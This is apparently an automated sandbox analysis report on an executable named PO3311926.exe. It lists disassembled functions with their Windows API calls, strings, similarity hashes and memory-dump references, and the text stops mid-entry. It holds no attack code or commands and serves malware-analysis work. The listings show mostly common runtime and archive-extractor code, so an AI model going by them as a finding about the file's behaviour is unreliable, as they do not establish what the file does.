Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f8d2f8c4a94e996ee9eeb2cd739e01e24ba75b8716717fd7a48d53862c586b59
Instruction ID: b1d6fb4c2773f96f2a32c03a6d29f3590da0c1ebd942fa7319f3c98053fef3ff
Opcode Fuzzy Hash: f8d2f8c4a94e996ee9eeb2cd739e01e24ba75b8716717fd7a48d53862c586b59
Instruction Fuzzy Hash: D901D472A022127F2321167A5CAEE7FABEDDEC2FA171401ADF914D3201EF608D0195B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BC91AD,00BCB188,?,00BC9813,00000001,00000364,?,00BC40EF,?,?,00BE1098), ref: 00BC986E
_free.LIBCMT ref: 00BC98A3
_free.LIBCMT ref: 00BC98CA
SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC98D7
SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC98E0

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: e2ad0ecdd2f1dbfe8ec31b5b1ae6b477f08a99ddf30f8ce0c46c86acc5b90cdf
Instruction ID: 8b37b9e761f96fa36876dfe06ebfc70e7b3aeddf3c643829af7f3169490f34f2
Opcode Fuzzy Hash: e2ad0ecdd2f1dbfe8ec31b5b1ae6b477f08a99ddf30f8ce0c46c86acc5b90cdf
Instruction Fuzzy Hash: 8001F4362466026BE3127768ACADF1B27E9DBD2BB073101BEF515A7192FE20CC015275

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00BB11CF: ResetEvent.KERNEL32(?), ref: 00BB11E1
Part of subcall function 00BB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BB11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BB0F21
CloseHandle.KERNEL32(?,?), ref: 00BB0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00BB0F54
CloseHandle.KERNEL32(?), ref: 00BB0F60
CloseHandle.KERNEL32(?), ref: 00BB0F6C

Part of subcall function 00BB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BB1101,?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FEA
Part of subcall function 00BB0FE4: GetLastError.KERNEL32(?,?,00BB117F,?,?,?,?,?,00BB1169), ref: 00BB0FF6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: c151f4299ba0205344f1fc27c0a6569db2e6945d7f2ed4ef10cd4d5e2e066cf2
Instruction ID: 15cdf4d235dd55d0ca6aeea84a7e8ccd72dd7f1d34caa3ba72c1ed5e892434db
Opcode Fuzzy Hash: c151f4299ba0205344f1fc27c0a6569db2e6945d7f2ed4ef10cd4d5e2e066cf2
Instruction Fuzzy Hash: 83017172501744EFC722AF64DC84BE6FBE9FB08B10F00096AF26B92161DBB57A45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BCC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BCC817

Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4

_free.LIBCMT ref: 00BCC829
_free.LIBCMT ref: 00BCC83B
_free.LIBCMT ref: 00BCC84D
_free.LIBCMT ref: 00BCC85F

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 59a10e2767e8b3da2b711d53a92dc9aa19852f7171476882d2239fdba1ea79b9
Instruction ID: a75f50d95db3b7a728dbc13d6ba2457c99bcf59e15df5ce856950491705e0202
Opcode Fuzzy Hash: 59a10e2767e8b3da2b711d53a92dc9aa19852f7171476882d2239fdba1ea79b9
Instruction Fuzzy Hash: ACF01232505200ABC660EB68F485E27B7E9EA1071475518AEF15DDB592DF70FC80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00BB1FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BB1FE5
_wcslen.LIBCMT ref: 00BB1FF6
_wcslen.LIBCMT ref: 00BB2006
_wcslen.LIBCMT ref: 00BB2014
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00BAB371,?,?,00000000,?,?,?), ref: 00BB202F

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 9b45d6adc559e9cda2f3b102a41ebbb4d9f51bd6ec69b3ea3e1c8332cae3154f
Instruction ID: 02540dc551998f8a00d08f09d2811e859bfb7ce4938b16007b70c64b8352dc79
Opcode Fuzzy Hash: 9b45d6adc559e9cda2f3b102a41ebbb4d9f51bd6ec69b3ea3e1c8332cae3154f
Instruction Fuzzy Hash: BDF01D32008019BFCF266F51EC09EDA7FA6EB44B60B51C499F61A5B062CB729661D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB15FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BB17BC
_swprintf.LIBCMT ref: 00BB186B

Strings

%s: %s, xrefs: 00BB17CB
%ls, xrefs: 00BB1641, 00BB1657

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: e84e374a5f87d961b2eb6771df09b1ed4c10d615fc10de05dca710ed387a2b12
Instruction ID: c24105b92fe9ce17374ec6e16ca173a5cb9124e81d5c6ad72f71da2f1c14803b
Opcode Fuzzy Hash: e84e374a5f87d961b2eb6771df09b1ed4c10d615fc10de05dca710ed387a2b12
Instruction Fuzzy Hash: A6510871248300F7E6211A9C8DE6FF673E5BB06B00FA44DD7F7A7650E1D9E2A810671A

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PO3311926.exe,00000104), ref: 00BC7FAE
_free.LIBCMT ref: 00BC8079
_free.LIBCMT ref: 00BC8083

Strings

C:\Users\user\Desktop\PO3311926.exe, xrefs: 00BC7FA5, 00BC7FAC, 00BC7FDB, 00BC8013

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\PO3311926.exe
API String ID: 2506810119-2425541809
Opcode ID: 2910b723b865c3b233710ce084ead2b9c53848e81f5bc1b70c41e8ee349e6553
Instruction ID: c83a201c1c8d4e360ee73fed4ea1fef8b898575a1d0ece3dd88e44217d58da90
Opcode Fuzzy Hash: 2910b723b865c3b233710ce084ead2b9c53848e81f5bc1b70c41e8ee349e6553
Instruction Fuzzy Hash: 1D316D71A00218AFDB21DF99D885F9EBBF8EF95310F1540EEF90497211DA718E45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BC31D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00BC31FB
_abort.LIBCMT ref: 00BC3306

Strings

MOC, xrefs: 00BC320D
RCC, xrefs: 00BC3215

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 5e8c7cdf4975a1e1c8b3e6775b75ac6300df7d865d7427c3c736370e5ee42aed
Instruction ID: d4c29ffaead9cdfdea3cdaa5791b7e557835570dbf838c1bc3fcd9b55d62b8c3
Opcode Fuzzy Hash: 5e8c7cdf4975a1e1c8b3e6775b75ac6300df7d865d7427c3c736370e5ee42aed
Instruction Fuzzy Hash: 34413672900209AFCF15DF98C981FEEBBF5EF48704F188099F905AA211D735AA50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00BA7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA7406

Part of subcall function 00BA3BBA: __EH_prolog.LIBCMT ref: 00BA3BBF

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00BA74CD

Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00

Strings

SeRestorePrivilege, xrefs: 00BA7460
SeSecurityPrivilege, xrefs: 00BA744B

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: a135a78f952155449092a4e85dd91413f0fe21342b1930bae85e1fee4266569d
Instruction ID: fa0da346ad0f2fbd3e8145c34db7a7b96eea5457536adca8be651a703e6173ed
Opcode Fuzzy Hash: a135a78f952155449092a4e85dd91413f0fe21342b1930bae85e1fee4266569d
Instruction Fuzzy Hash: 103190B1D4C248AADF11EBA8DC45BEEBBE9EB1A304F044095F445A7292DF748A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

EndDialog.USER32(?,00000001), ref: 00BBAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00BBADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BBADC2

Strings

ASKNEXTVOL, xrefs: 00BBAD28

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 3e86b08b1be5694c025aaed02fc22ebc8d1dc415f621b4b48a65da0d2cbe4afc
Instruction ID: 4774e5e058913133da1b8095d8487487e12f0a4a19e08528bde5a4a9b7b5716b
Opcode Fuzzy Hash: 3e86b08b1be5694c025aaed02fc22ebc8d1dc415f621b4b48a65da0d2cbe4afc
Instruction Fuzzy Hash: 7A11AF32B44200BFD6118F68DC85FBE7BEDEB4A702F4504A1F641AA4A0C6A1D905DB22

Uniqueness

Uniqueness Score: -1.00%

Function 00BAD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 00BAD954
_strncpy.LIBCMT ref: 00BAD99A

Part of subcall function 00BB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00BE1030,?,00BAD928,00000000,?,00000050,00BE1030), ref: 00BB1DC4

Strings

$%s, xrefs: 00BAD949
@%s, xrefs: 00BAD93E

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 5e36e480853b9c1c9686caf2461920b6a580f649f67e4977d95f0f276c20aef0
Instruction ID: 5bf4c4e7d931bf3a27cb78ed102460a6ccc6729c5c475acc455897cb178a4a84
Opcode Fuzzy Hash: 5e36e480853b9c1c9686caf2461920b6a580f649f67e4977d95f0f276c20aef0
Instruction Fuzzy Hash: B921A272944248AEDB20EFA4CC45FEF7BE8EF06700F0404A2F911965A2E371D649CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BB0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00BAAC5A,00000008,?,00000000,?,00BAD22D,?,00000000), ref: 00BB0E9F

Strings

Thread pool initialization failed., xrefs: 00BB0EB7

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 5e28930cab488712dfbc431210eddb7df621edafb5b0eb015fd937f39a0e2c55
Instruction ID: be772db52ae886d0cea6995cdd47ed2b0fec2532927149eeab028daa1e4b288f
Opcode Fuzzy Hash: 5e28930cab488712dfbc431210eddb7df621edafb5b0eb015fd937f39a0e2c55
Instruction Fuzzy Hash: DA1191B1A047089FC3215F6ADC84AB7FBECEB55754F144C6EF1DAC3201EAB199408B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BBB270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00BA1316: GetDlgItem.USER32(00000000,00003021), ref: 00BA135A
Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370

EndDialog.USER32(?,00000001), ref: 00BBB2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00BBB2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00BBB304

Strings

GETPASSWORD1, xrefs: 00BBB289

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: c8f648c58eb2602c30dd1494f99d8ac519a1f8b05dc009d4b14dc731816c0f43
Instruction ID: 93e406f10921a936055f4db406430dc54e73b784e9faee812e7fdc9c29281ce7
Opcode Fuzzy Hash: c8f648c58eb2602c30dd1494f99d8ac519a1f8b05dc009d4b14dc731816c0f43
Instruction Fuzzy Hash: E811C032940119BBDF229AA49D49FFF3BECEF1A700F0000A5FA45F7180C7E09A4597A5

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00BBDD1C, 00BBDD50
RENAMEDLG, xrefs: 00BBDD31

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 34e18c83e5ef2e6fa95695b77733c0a14d59166238020e96137d12b450fd4841
Instruction ID: bbe3ebcda4968490c93ad884b22308f77e6d692316db960b8536d2d127b08803
Opcode Fuzzy Hash: 34e18c83e5ef2e6fa95695b77733c0a14d59166238020e96137d12b450fd4841
Instruction Fuzzy Hash: 0E01B136604685AFD7118F58FC84ABA7BE8F708344B100476F849C7371EAB0C850EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BC9AA9
__alldvrm.LIBCMT ref: 00BC9CAA
__alldvrm.LIBCMT ref: 00BC9CCC

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: bb5c0b8f12a987649086b74583da53dc01b4fc4e891f63a91cc325ec0d354777
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: C6A14672A047869FFB25CF28C895FAEBBE5EF51310F2841EDE4969B281C6349D41C750

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BA7F69,?,?,?), ref: 00BAA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BA7F69,?), ref: 00BAA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BA7F69,?,?,?,?,?,?,?), ref: 00BAA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00BA7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BAA4C6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
